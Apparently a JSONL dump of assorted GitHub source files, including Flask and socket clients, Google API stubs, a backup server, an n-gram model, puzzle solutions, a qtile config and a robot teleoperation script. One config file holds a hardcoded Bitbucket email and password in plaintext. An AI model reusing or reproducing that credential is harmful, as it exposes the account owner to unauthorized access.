check_vlaue == '酷我音乐':\n song_id = kume(key_vlaue)\n elif check_vlaue == '酷狗音乐':\n song_id =ku_dog(key_vlaue)\n elif check_vlaue == \"下载吧\":\n song = Song()\n song_id = song.search_song_Byname(key_vlaue)\n elif check_vlaue == '咪咕音乐':\n mi = miGuSong()\n song_id = mi.main(key_vlaue)\n if song_id != '':\n data = dict(data=song_id, statu=0)\n return jsonify(data)\n else:\n return jsonify({})\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","repo_name":"1984234517/music_video","sub_path":"Music.py","file_name":"Music.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71932671843","text":"import threading\nimport socket\nfrom tkinter import Tk, Frame,Button,Label, ttk\nimport sys\nimport time\n\nestado_Senal = \"Stop\"\n\n\nclass Servidor_Connect:\n\n def __init__(self):\n\n\n self.Ip_Servidor = socket.gethostname()\n self.Puerto = 1234\n self.flag = False\n\n def conectar(self):\n\n global estado_Senal\n\n while True:\n\n self.datos_envio = estado_Senal\n self.trama = self.datos_envio.encode(\"utf-8\")\n\n try:\n\n if not self.flag:\n socket_1.connect((self.Ip_Servidor,self.Puerto))\n\n self.flag = True\n\n except ConnectionRefusedError:\n\n print(\"NO CONECTADO A SERVER\")\n continue\n\n try:\n\n socket_1.send(self.trama)\n print(self.trama)\n bytes_a_recibir = 1024\n mensaje_Recibido = socket_1.recv(bytes_a_recibir)\n texto = mensaje_Recibido.decode(\"utf-8\")\n print(texto)\n\n except ConnectionResetError:\n\n print(\"No hay conexion\")\n break\n\n\nif __name__ == '__main__':\n\n socket_1 = socket.socket()\n\n ventana = Tk()\n ventana.geometry('500x100')\n ventana.wm_title('Osciloscopio')\n ventana.minsize(width=200, height=200)\n\n frame = Frame(ventana, bg='white', bd=3)\n frame.pack(fill='both')\n\n def begin():\n global estado_Senal\n estado_Senal = \"Run\"\n\n def pausar():\n global estado_Senal\n estado_Senal = \"Stop\"\n\n\n def reanudar():\n global estado_Senal\n estado_Senal = \"Play\"\n\n Button(frame, text='INICIO',width=15, bg='#FF5F00',fg='black',command=begin).pack(pady=5, side='left',expand=1)\n Button(frame, text= 'PAUSAR',width=15, bg='#0DFFF5',fg='black',command=pausar).pack(pady=5, side='left', expand=1)\n Button(frame, text='REANUDAR',width=15, bg='#FF0545',fg='black', command=reanudar).pack(pady=5, side='left', expand=1)\n\n conexion = Servidor_Connect()\n hilo1 = threading.Thread(target = conexion.conectar)\n hilo1.start()\n\n\n ventana.mainloop()","repo_name":"DarBEJ2903/APPS","sub_path":"APP2_OSCILOSCOPIO/cliente2.py","file_name":"cliente2.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7001705556","text":"import collections.abc\nimport typing\n\nimport httplib2 # type: ignore\nimport typing_extensions\n\nimport googleapiclient.discovery\nimport googleapiclient.http # type: ignore\n\nfrom .schemas import *\n\n_list = list\n\n@typing.type_check_only\nclass TestingResource(googleapiclient.discovery.Resource):\n @typing.type_check_only\n class ApplicationDetailServiceResource(googleapiclient.discovery.Resource):\n def getApkDetails(\n self, *, body: FileReference = ..., **kwargs: typing.Any\n ) -> GetApkDetailsResponseHttpRequest: ...\n\n @typing.type_check_only\n class ProjectsResource(googleapiclient.discovery.Resource):\n @typing.type_check_only\n class DeviceSessionsResource(googleapiclient.discovery.Resource):\n def cancel(\n self,\n *,\n name: str,\n body: CancelDeviceSessionRequest = ...,\n **kwargs: typing.Any\n ) -> EmptyHttpRequest: ...\n def create(\n self, *, parent: str, body: DeviceSession = ..., **kwargs: typing.Any\n ) -> DeviceSessionHttpRequest: ...\n def get(\n self, *, name: str, **kwargs: typing.Any\n ) -> DeviceSessionHttpRequest: ...\n def list(\n self,\n *,\n parent: str,\n filter: str = ...,\n pageSize: int = ...,\n pageToken: str = ...,\n **kwargs: typing.Any\n ) -> ListDeviceSessionsResponseHttpRequest: ...\n def list_next(\n self,\n previous_request: ListDeviceSessionsResponseHttpRequest,\n previous_response: ListDeviceSessionsResponse,\n ) -> ListDeviceSessionsResponseHttpRequest | None: ...\n def patch(\n self,\n *,\n name: str,\n body: DeviceSession = ...,\n updateMask: str = ...,\n **kwargs: typing.Any\n ) -> DeviceSessionHttpRequest: ...\n\n @typing.type_check_only\n class TestMatricesResource(googleapiclient.discovery.Resource):\n def cancel(\n self, *, projectId: str, testMatrixId: str, **kwargs: typing.Any\n ) -> CancelTestMatrixResponseHttpRequest: ...\n def create(\n self,\n *,\n projectId: str,\n body: TestMatrix = ...,\n requestId: str = ...,\n **kwargs: typing.Any\n ) -> TestMatrixHttpRequest: ...\n def get(\n self, *, projectId: str, testMatrixId: str, **kwargs: typing.Any\n ) -> TestMatrixHttpRequest: ...\n\n def deviceSessions(self) -> DeviceSessionsResource: ...\n def testMatrices(self) -> TestMatricesResource: ...\n\n @typing.type_check_only\n class TestEnvironmentCatalogResource(googleapiclient.discovery.Resource):\n def get(\n self,\n *,\n environmentType: typing_extensions.Literal[\n \"ENVIRONMENT_TYPE_UNSPECIFIED\",\n \"ANDROID\",\n \"IOS\",\n \"NETWORK_CONFIGURATION\",\n \"PROVIDED_SOFTWARE\",\n \"DEVICE_IP_BLOCKS\",\n ],\n projectId: str = ...,\n **kwargs: typing.Any\n ) -> TestEnvironmentCatalogHttpRequest: ...\n\n def new_batch_http_request(\n self,\n callback: collections.abc.Callable[\n [\n str,\n googleapiclient.http.HttpRequest,\n googleapiclient.errors.HttpError | None,\n ],\n typing.Any,\n ]\n | None = ...,\n ) -> googleapiclient.http.BatchHttpRequest: ...\n def applicationDetailService(self) -> ApplicationDetailServiceResource: ...\n def projects(self) -> ProjectsResource: ...\n def testEnvironmentCatalog(self) -> TestEnvironmentCatalogResource: ...\n\n@typing.type_check_only\nclass CancelTestMatrixResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> CancelTestMatrixResponse: ...\n\n@typing.type_check_only\nclass DeviceSessionHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> DeviceSession: ...\n\n@typing.type_check_only\nclass EmptyHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> Empty: ...\n\n@typing.type_check_only\nclass GetApkDetailsResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> GetApkDetailsResponse: ...\n\n@typing.type_check_only\nclass ListDeviceSessionsResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> ListDeviceSessionsResponse: ...\n\n@typing.type_check_only\nclass TestEnvironmentCatalogHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> TestEnvironmentCatalog: ...\n\n@typing.type_check_only\nclass TestMatrixHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> TestMatrix: ...\n","repo_name":"henribru/google-api-python-client-stubs","sub_path":"googleapiclient-stubs/_apis/testing/v1/resources.pyi","file_name":"resources.pyi","file_ext":"pyi","file_size_in_byte":5829,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"54"} +{"seq_id":"20390491852","text":"import os\nimport reporter\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\ndef report(type, msg):\n reporter.report(type, msg, 'Backup Manager')\n\n\nclass BackupServerWeb(BaseHTTPRequestHandler):\n backupFunction = None\n secureDeleteFunction = None\n challengeCode = os.environ['CHALLENGE_CODE']\n\n def do_HEAD(self):\n print (4)\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n def do_GET(self):\n if not self.PreAuth():\n self.respond({'status': 400})\n return\n\n if self.path == '/backup':\n self.RunOnDemanBackup()\n self.respond({'status': 200})\n else:\n self.respond({'status': 500})\n\n def handle_http(self, status_code, path):\n self.send_response(status_code)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n return bytes('', 'UTF-8')\n\n def respond(self, opts):\n response = self.handle_http(opts['status'], self.path)\n self.wfile.write(response)\n\n def PreAuth(self):\n if 'challenge' not in self.headers or 'name' not in self.headers:\n return False\n return BackupServerWeb.challengeCode == self.headers['challenge']\n\n def RunOnDemanBackup(self):\n fileName = BackupServerWeb.backupFunction(self.headers['name'])\n BackupServerWeb.secureDeleteFunction(fileName + '.sql', 3)\n report('info', 'On-demand backup successful [{fn}]'.format(fn=fileName))","repo_name":"teamwhileloop/ucsc-results-center","sub_path":"system/httpserver.py","file_name":"httpserver.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"54"} +{"seq_id":"20575822153","text":"import os\n\n#-- things you have to modify as long as you're on a new comp --#\n\nANDROID_SDK_PATH_LIS = [\n \"/Applications/Android\\ Studio.app/sdk/platform-tools\",\n \"/Applications/Android\\ Studio.app/sdk/tools\"\n]\nIOS_PHONEGAP_BIN_PATH = \"/Users/nubela/Workspace/phonegap-2.7.0/lib/ios/bin\"\nANDROID_PHONEGAP_BIN_PATH = \"/Users/nubela/Workspace/phonegap-2.7.0/lib/android/bin\"\nWATCHER_FILE_PATH = \"/Users/nubela/Workspace/transcompiler-watcher/src/watch.py\"\n\n#-- some config that i tried to automate, but you can modify as you deem fit --#\n\nCWD = os.getcwd()\nDICT_FILE = os.path.join(CWD, \"settings.cfg\")\nMETEOR_PORT_RANGE = range(3001, 10000)\nWORKSPACE_DIR = os.path.dirname(CWD)\nPLOP_PROJECT_PATH = os.path.join(WORKSPACE_DIR, \"unifide-plop\")\nRESOURCES_PATH = os.path.join(CWD, \"resources\")\nWEB_FOLDER_PATH = os.path.join(RESOURCES_PATH, \"web\")\nBITBUCKET_USERNAME = \"hello@unifide.sg\"\nBITBUCKET_PASSWD = \"thisisnotsecureatall\"\n\n#-- do not fuck below this line unless you know what you are doing --#\n\nREQUIREMENTS = [\n \"Flask==0.9\",\n \"pymongo==2.4.2\",\n \"flask-login==0.1.3\",\n \"validate_email==1.1\",\n \"unidecode==0.04.12\",\n \"py-lorem==1.2\",\n \"pil==1.1.7\",\n]\n\nPROJ_FILES = [\n os.path.join(RESOURCES_PATH, \"web.wsgi\"),\n os.path.join(RESOURCES_PATH, \"run.py\"),\n os.path.join(RESOURCES_PATH, \"cfg.py\"),\n os.path.join(RESOURCES_PATH, \"_cfg.py\"),\n os.path.join(RESOURCES_PATH, \".gitignore\"),\n]\n\nBACKEND_CFG = [\n \"brand_cfg.py\",\n \"cfg.py\",\n]\n\nPLOP_LIBRARIES = [\n \"base\",\n \"campaigns\",\n \"comments\",\n \"ecommerce\",\n \"orders\",\n \"support\",\n]","repo_name":"nubela/plop-plop","sub_path":"_cfg.py","file_name":"_cfg.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26813561001","text":"import nltk\r\nfrom nltk.corpus import brown\r\nfrom nltk.lm import MLE\r\nfrom nltk.lm.preprocessing import padded_everygram_pipeline\r\n\r\n\r\nclass ngram_language_model:\r\n def __init__(self):\r\n self.model = None\r\n self.valid_text = None\r\n\r\n def build_and_train_model(self):\r\n text = brown.sents(\r\n categories=[\r\n 'adventure', 'belles_lettres', 'editorial', 'fiction',\r\n 'government', 'hobbies', 'humor', 'learned', 'lore',\r\n 'mystery', 'news', 'religion', 'reviews', 'romance',\r\n 'science_fiction'\r\n ]\r\n )\r\n valid_text = []\r\n for sentence in text:\r\n words = []\r\n for word in sentence:\r\n words.extend(nltk.word_tokenize(word))\r\n valid_text.append(words)\r\n\r\n self.valid_text = valid_text\r\n\r\n n = 3 # length of largest everygram\r\n\r\n train_data, padded_sents = padded_everygram_pipeline(n, valid_text)\r\n\r\n self.model = MLE(n)\r\n self.model.fit(train_data, padded_sents)\r\n return\r\n\r\n def make_predictions(self, msg, number_of_predictions=5):\r\n \"\"\"\r\n makes prediction for the next possible words using the available words\r\n \"\"\"\r\n sentence = []\r\n for x in msg.strip().split():\r\n sentence.extend(nltk.word_tokenize(x))\r\n alpha = 0.1\r\n beta = 0.3\r\n gamma = 0.6\r\n predictions = []\r\n prediction_dict = {}\r\n for word in self.model.vocab:\r\n alpha_prob = alpha*self.model.score(word)\r\n beta_prob = beta*self.model.score(word, sentence[-1:])\r\n gamma_prob = gamma*self.model.score(word, sentence[-2:])\r\n prob = alpha_prob + beta_prob + gamma_prob\r\n predictions.append((word, prob))\r\n predictions.sort(key=lambda x: x[1], reverse=True)\r\n for word, prob in predictions[:number_of_predictions]:\r\n prediction_dict[word] = prob\r\n return prediction_dict\r\n\r\n\r\nif __name__ == '__main__':\r\n # ng = ngram_language_model()\r\n # ng.build_and_train_model()\r\n # ng.make_predictions(\"I am \")\r\n pass\r\n","repo_name":"sushantMoon/isi-nlp","sub_path":"assignment1/n_gram.py","file_name":"n_gram.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13460263742","text":"t = int(input())\nfor case in range(1,t+1):\n n,k = map(int,input().split())\n things = []\n for _ in range(n):\n v,c = map(int,input().split())\n things.append((v,c))\n dp = [[0] * (k+1) for _ in range(n+1)]\n for i in range(1,n+1):\n for j in range(1,k+1):\n volume = things[i-1][0]\n cost = things[i-1][1]\n if j < volume:\n dp[i][j] = dp[i-1][j]\n else:\n dp[i][j] = max(dp[i-1][j], dp[i-1][j-volume] + cost)\n print(f\"#{case} {dp[n][k]}\")","repo_name":"yootal/CodingTest","sub_path":"SWEA/D3/3282. 0/1 Knapsack/0/1 Knapsack.py","file_name":"0/1 Knapsack.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8859083366","text":"\ndef convert_txt_input_to_int_list(txt):\n input_list = []\n f = open(txt, \"r\")\n for x in f:\n input_list.append(int(x))\n f.close()\n return input_list\n\ndef compare_first_two_nums(the_list):\n \"\"\"Compare the 1st and second value in the list,\n append to the last list if second greater than 1st\n\n Args:\n the_list (list): Integer input from the file\n\n Return:\n (list):List of all the possible ride strategies\n \"\"\"\n scary_ride_strategies = []\n temp = 0\n prev = 0\n fun_sum = 0\n while (len(the_list)!=0):\n temp = the_list.pop(0)\n if temp>prev and len(the_list)>0:\n fun_sum+=10\n\n elif temp>prev and len(the_list)==0:\n fun_sum+=10\n scary_ride_strategies.append(fun_sum)\n\n else:\n scary_ride_strategies.append(fun_sum)\n fun_sum = 10\n\n prev = temp\n \n\n\n return scary_ride_strategies\n\n\nif __name__ == \"__main__\":\n the_input = convert_txt_input_to_int_list(\"rollercoasters_medium_sample_input.txt\")\n fun_strategies = compare_first_two_nums(the_input)\n the_max_fun = max(fun_strategies)\n f = open(\"outsample.txt\", \"w\")\n f.write(str(the_max_fun))\n f.close()","repo_name":"sibo-t/Meta-hackerthon","sub_path":"Rollercoaster/rollercoaster.py","file_name":"rollercoaster.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21785859541","text":"__all__ = [\"mobilenet\"]\n\nfrom types import MethodType\nfrom typing import List\n\nfrom icevision.utils.torch_utils import check_all_model_params_in_groups2\nfrom torch import nn\nimport torchvision\nfrom icevision.models.fastai.unet.backbones.backbone_config import (\n TorchvisionUNetBackboneConfig,\n)\n\n\ndef mobilenet_fn(pretrained: bool = True):\n model = torchvision.models.mobilenet_v2(pretrained=pretrained)\n\n features = model.features\n features.out_channels = 1280\n features.param_groups = MethodType(mobilenet_param_groups, features)\n\n return features\n\n\ndef mobilenet_param_groups(model: nn.Module) -> List[List[nn.Parameter]]:\n layers = []\n layers += [nn.Sequential(*model[0])]\n layers += [nn.Sequential(*model[1:3])]\n layers += [nn.Sequential(*model[3:12])]\n layers += [nn.Sequential(*model[12:])]\n\n param_groups = [list(layer.parameters()) for layer in layers]\n check_all_model_params_in_groups2(model, param_groups)\n\n return param_groups\n\n\nmobilenet = TorchvisionUNetBackboneConfig(backbone_fn=mobilenet_fn)\n","repo_name":"airctic/icevision","sub_path":"icevision/models/fastai/unet/backbones/mobilenet_configs.py","file_name":"mobilenet_configs.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":839,"dataset":"github-code","pt":"54"} +{"seq_id":"21271453468","text":"\"\"\"\n \n .88888888:.\n 88888888.88888.\n .8888888888888888.\n 888888888888888888\n 88' _`88'_ `88888\n 88 88 88 88 88888\n 88_88_::_88_:88888\n 88:::,::,:::::8888\n 88`:::::::::'`8888\n .88 `::::' 8:88.\n 8888 `8:888.\n .8888' `888888.\n .8888:.. .::. ...:'8888888:.\n .8888.' :' `'::`88:88888\n .8888 ' `.888:8888.\n 888:8 . 888:88888\n .888:88 .: 888:88888:\n 8888888. :: 88:888888\n `.::.888. :: .88888888\n .::::::.888. :: :::`8888'.:.\n ::::::::::.888 ' .::::::::::::\n ::::::::::::.8 ' .:8::::::::::::.\n .::::::::::::::. .:888:::::::::::::\n :::::::::::::::88:.__..:88888:::::::::::'\n `'.:::::::::::88888888888.88:::::::::'\n `':::_:' -- '' -'-' `':_::::'`\n\"\"\"\n#My settings\nfrom settings.keys import mod, keys\nfrom settings.groups import groups\n\n\nfrom libqtile import bar, layout, widget,hook\nfrom libqtile.config import Click, Drag, Group, Match, Screen\n\n\nimport os\nimport subprocess\n\n\n\nlayouts = [\n layout.Columns(\n #order_normal=\"#D3D3D3\",\n border_focus = '#81a1c1',\n border_width=2,\n margin=4,\n margin_on_single=8),\n layout.Max(),\n # Try more layouts by unleashing below layouts.\n # layout.Stack(num_stacks=2),\n # layout.Bsp(),\n # layout.Matrix(),\n # layout.MonadTall(),\n # layout.MonadWide(),\n # layout.RatioTile(),\n # layout.Tile(),\n # layout.TreeTab(),\n # layout.VerticalTile(),\n # layout.Zoomy(),\n]\n\nwidget_defaults = dict(\n font=\"Hack Nerd Font\",\n fontsize=18,\n padding=3,\n)\nextension_defaults = widget_defaults.copy()\n\nscreens = [\n Screen(\n top=bar.Bar(\n [\n widget.GroupBox(disable_drag=True), \n widget.Prompt(),\n widget.WindowName(),\n widget.Chord(\n chords_colors={\n \"launch\": (\"#ff0000\", \"#ffffff\"),\n },\n name_transform=lambda name: name.upper(),\n ),\n widget.CurrentLayout(),\n widget.TextBox(\"default config\", name=\"default\"),\n widget.TextBox(\"Press <M-r> to spawn\", foreground=\"#d75f5f\"),\n widget.Systray(),\n widget.Clock(format=\"%Y-%m-%d %a %I:%M %p\"),\n \n widget.QuickExit(),\n widget.Volume(fmt='Vol: {}'),\n ],\n 24,\n border_width=[2,2,2,2], # Draw top and bottom borders\n border_color=[\"ff00ff\", \"ff00ff\", \"ff00ff\", \"ff00ff\"], # Borders are magenta\n margin = [10,0,4,2] #Espacio alrededor de la barra, dado como lista de enteros [N E S W].\n ),\n ),\n]\n\n#Hooks\n\n@hook.subscribe.startup_once\ndef autostart():\n home = os.path.expanduser('~/.config/qtile/scripts/autostart.sh')\n subprocess.run([home])\n\n\n\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: list\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(\n float_rules=[\n # Run the utility of `xprop` to see the wm class and name of an X client.\n *layout.Floating.default_float_rules,\n Match(wm_class=\"confirmreset\"), # gitk\n Match(wm_class=\"makebranch\"), # gitk\n Match(wm_class=\"maketag\"), # gitk\n Match(wm_class=\"ssh-askpass\"), # ssh-askpass\n Match(title=\"branchdialog\"), # gitk\n Match(title=\"pinentry\"), # GPG key password entry\n Match(title=\"Picture-in-Picture\"),\n ]\n)\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\nreconfigure_screens = True\n\n# If things like steam games want to auto-minimize themselves when losing\n# focus, should we respect this or not?\nauto_minimize = True\n\n# When using the Wayland backend, this can be used to configure input devices.\nwl_input_rules = None\n\n# XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this\n# string besides java UI toolkits; you can see several discussions on the\n# mailing lists, GitHub issues, and other WM documentation that suggest setting\n# this string if your java app doesn't work correctly. We may as well just lie\n# and say that we're a working one by default.\n#\n# We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in\n# java that happens to be on java's whitelist.\nwmname = \"LG3D\"\n","repo_name":"AlejandroCruz-0/dotfiles","sub_path":".config/qtile/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13490294900","text":"import os\nimport sys\nimport subprocess\nimport time\nimport signal\nimport random\nimport logging\nimport faulthandler\nimport threading\nimport functools\nimport cv2\nimport matplotlib.pyplot as plt\n\nfrom droidlet import dashboard\nfrom droidlet.dashboard.o3dviz import O3DViz\nimport numpy as np\nfrom scipy.spatial import distance\nimport open3d as o3d\nfrom droidlet.lowlevel.hello_robot.remote.obstacle_utils import get_points_in_front, is_obstacle, get_o3d_pointcloud, get_ground_plane\n\nimport time\nimport math\n\n\nif __name__ == \"__main__\":\n # this line has to go before any imports that contain @sio.on functions\n # or else, those @sio.on calls become no-ops\n dashboard.start()\n if sys.platform == \"darwin\":\n webrtc_streaming=False\n else:\n webrtc_streaming=True\n o3dviz = O3DViz(webrtc_streaming)\n o3dviz.start()\n\nfrom droidlet.interpreter.robot import (\n dance, \n default_behaviors,\n LocoGetMemoryHandler, \n PutMemoryHandler, \n LocoInterpreter,\n)\nfrom droidlet.dialog.robot import LocoBotCapabilities\nfrom droidlet.event import sio\nfrom agents.locobot.end_to_end_semantic_scout import EndToEndSemanticScout\n\nfaulthandler.register(signal.SIGUSR1)\n\nrandom.seed(0)\nlog_formatter = logging.Formatter(\n \"%(asctime)s [%(filename)s:%(lineno)s - %(funcName)s() %(levelname)s]: %(message)s\"\n)\nlogging.getLogger().setLevel(logging.DEBUG)\nlogging.getLogger().handlers.clear()\n\n\nmover = None\n\n# TODO Cleaner way to get scout object state (semantic map + goal) in dashboard\nend_to_end_vis = None\nmodular_vis = None\n\n\n@sio.on(\"sendCommandToAgent\")\ndef get_command(sid, command):\n tokens = command.split()\n command, value = tokens[0], \" \".join(tokens[1:])\n if len(value) == 0:\n value = None\n test_command(sid, [command], value=value)\n\n@sio.on(\"logData\")\ndef log_data(sid, seconds):\n test_command(sid, [\"LOG_DATA\"], value=seconds)\n\n@sio.on(\"stopRobot\")\ndef stop_robot(sid):\n test_command(sid, [\"STOP_ROBOT\"])\n\n@sio.on(\"unstopRobot\")\ndef unstop_robot(sid):\n test_command(sid, [\"UNSTOP_ROBOT\"])\n\n\ndef test_command(sid, commands, data={\"yaw\": 0.1, \"velocity\": 0.1, \"move\": 0.3}, value=None):\n print(commands, data, value)\n move_dist = float(data['move'])\n yaw = float(data['yaw'])\n velocity = float(data['velocity'])\n\n global mover\n global end_to_end_vis\n global modular_vis\n\n if mover == None:\n return\n if value is not None:\n move_dist = value\n\n def sync():\n time.sleep(10)\n for i in range(50):\n mover.get_rgb_depth()\n\n movement = [0.0, 0.0, 0.0]\n for command in commands:\n if command == \"MOVE_FORWARD\":\n movement[0] += float(move_dist)\n print(\"action: FORWARD\", movement)\n mover.move_relative([movement], blocking=False)\n elif command == \"MOVE_BACKWARD\":\n movement[0] -= float(move_dist)\n print(\"action: BACKWARD\", movement)\n mover.move_relative([movement], blocking=False)\n elif command == \"MOVE_LEFT\":\n movement[2] += yaw\n print(\"action: LEFT\", movement)\n mover.move_relative([movement], blocking=False)\n elif command == \"MOVE_RIGHT\":\n movement[2] -= yaw\n print(\"action: RIGHT\", movement)\n mover.move_relative([movement], blocking=False)\n elif command == \"PAN_LEFT\":\n mover.bot.set_pan(mover.get_pan() + yaw)\n sync()\n elif command == \"PAN_RIGHT\":\n mover.bot.set_pan(mover.get_pan() - yaw)\n sync()\n elif command == \"TILT_UP\":\n mover.bot.set_tilt(mover.get_tilt() + yaw)\n print(\"action: TILT_UP\", mover.get_tilt() + yaw)\n sync()\n elif command == \"TILT_DOWN\":\n mover.bot.set_tilt(mover.get_tilt() - yaw)\n sync()\n elif command == \"LOG_DATA\":\n mover.log_data_start(float(value)) # in seconds\n elif command == \"STOP_ROBOT\":\n mover.stop()\n elif command == \"UNSTOP_ROBOT\":\n mover.unstop()\n elif command == \"SET_PAN\":\n print(\"action: SET_PAN\", float(value))\n mover.bot.set_pan(float(value))\n sync()\n elif command == \"SET_TILT\":\n print(\"action: SET_TILT\", float(value))\n mover.bot.set_tilt(float(value))\n sync()\n elif command == \"MOVE_ABSOLUTE\":\n xyyaw_s = value.split(',')\n xyyaw_f = [float(v) for v in xyyaw_s]\n print(\"action: MOVE_ABSOLUTE\", xyyaw_f)\n mover.move_absolute(xyyaw_f, blocking=False)\n sync()\n\n # Commands we introduce\n elif command == \"SEARCH_OBJECT_MODULAR_LEARNED\":\n if \"_\" in value.strip():\n object_goal, episode_id = [x.strip() for x in value.split(\"_\")]\n else:\n object_goal = episode_id = value.strip()\n print(\"action: SEARCH_OBJECT_MODULAR_LEARNED\", object_goal)\n mover.move_to_object(\n object_goal,\n episode_id=episode_id,\n exploration_method=\"learned\",\n blocking=False\n )\n modular_vis = True\n sync()\n elif command == \"SEARCH_OBJECT_MODULAR_HEURISTIC\":\n if \"_\" in value.strip():\n object_goal, episode_id = [x.strip() for x in value.split(\"_\")]\n else:\n object_goal = episode_id = value.strip()\n print(\"action: SEARCH_OBJECT_MODULAR_HEURISTIC\", object_goal)\n mover.move_to_object(\n object_goal,\n episode_id=episode_id,\n exploration_method=\"frontier\",\n blocking=False\n )\n modular_vis = True\n sync()\n elif command == \"SEARCH_OBJECT_END_TO_END\":\n if \"_\" in value.strip():\n object_goal, episode_id = [x.strip() for x in value.split(\"_\")]\n else:\n object_goal = episode_id = value.strip()\n print(\"action: SEARCH_OBJECT_END_TO_END\", object_goal)\n mover.slam.disable_semantic_map_update()\n scout = EndToEndSemanticScout(\n mover,\n episode_id=episode_id,\n object_goal=object_goal,\n # policy=\"robot_camera_settings_without_noise_and_coco_detector_il\", # NO DEPTH NOISE IL\n # policy=\"robot_camera_settings_without_noise_and_coco_detector_rl\", # NO DEPTH NOISE RL\n policy=\"robot_camera_settings_and_coco_detector_rl\", # WITH DEPTH NOISE \n # policy=\"original_camera_settings_and_mp3d_detector_rl\", # ORIGINAL \n )\n while not scout.finished:\n scout.step(mover)\n end_to_end_vis = scout.semantic_frame\n\n elif command == \"LOOK_AT\":\n xyz = value.split(',')\n xyz = [float(p) for p in xyz]\n print(\"action: LOOK_AT\", xyz)\n mover.look_at(xyz, turn_base=False)\n elif command == \"RESET\":\n mover.bot.set_tilt(0.)\n mover.bot.set_pan(0.)\n elif command == \"TAKE_PHOTO\":\n filename = value.strip()\n # rgb_depth = mover.get_rgb_depth()\n # rgb, depth = rgb_depth.rgb, rgb_depth.depth\n rgb, depth = mover.get_rgb_depth_optimized_for_habitat_transfer()\n plt.imsave(f\"pictures/{filename}_rgb.png\", rgb)\n plt.imsave(f\"pictures/{filename}_depth.png\", depth)\n np.save(f\"pictures/{filename}_rgb.npy\", rgb)\n np.save(f\"pictures/{filename}_depth.npy\", depth)\n\n print(command, movement)\n\n@sio.on(\"movement command\")\ndef test_command_web(sid, commands, data, value=None):\n test_command(sid, commands, data=data, value=value)\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Pass in server device IP\")\n parser.add_argument(\n \"--ip\",\n help=\"Server device (robot) IP. Default is 0.0.0.0\",\n type=str,\n default=\"0.0.0.0\",\n )\n parser.add_argument(\n \"--backend\",\n help=\"Which backend to use: habitat (default), hellorobot\",\n type=str,\n default='habitat',\n )\n args = parser.parse_args()\n \n ip = args.ip\n backend = args.backend\n \n print(\"Connecting to robot at ip: \", ip)\n\n if backend == 'habitat':\n from droidlet.lowlevel.locobot.locobot_mover import LoCoBotMover\n mover = LoCoBotMover(ip=ip, backend='habitat')\n elif backend == 'hellorobot':\n from droidlet.lowlevel.hello_robot.hello_robot_mover import HelloRobotMover\n mover = HelloRobotMover(ip=ip)\n print(\"Mover is ready to be operated\")\n\n log_settings = {\n \"image_resolution\": 512, # pixels\n \"image_quality\": 10, # from 10 to 100, 100 being best\n }\n\n all_points = None\n all_colors = None\n first = True\n prev_stg = None\n path_count = 0\n\n start_time = time.time_ns()\n fps_freq = 1 # displays the frame rate every 1 second\n counter = 0\n if backend == 'habitat':\n mover.bot.set_pan(0.0)\n # mover.bot.set_tilt(-1.5)\n else: # hellorobot\n mover.bot.set_pan(0.0)\n # mover.bot.set_tilt(-1.05)\n\n while True:\n counter += 1\n iter_time = time.time_ns() - start_time\n if float(iter_time) / 1e9 > fps_freq :\n # print(\"FPS: \", round(counter / (float(iter_time) / 1e9), 1), \" \", int(iter_time / 1e6 / counter), \"ms\")\n counter = 0\n start_time = time.time_ns()\n\n base_state = mover.get_base_pos_in_canonical_coords()\n\n sio.emit(\"image_settings\", 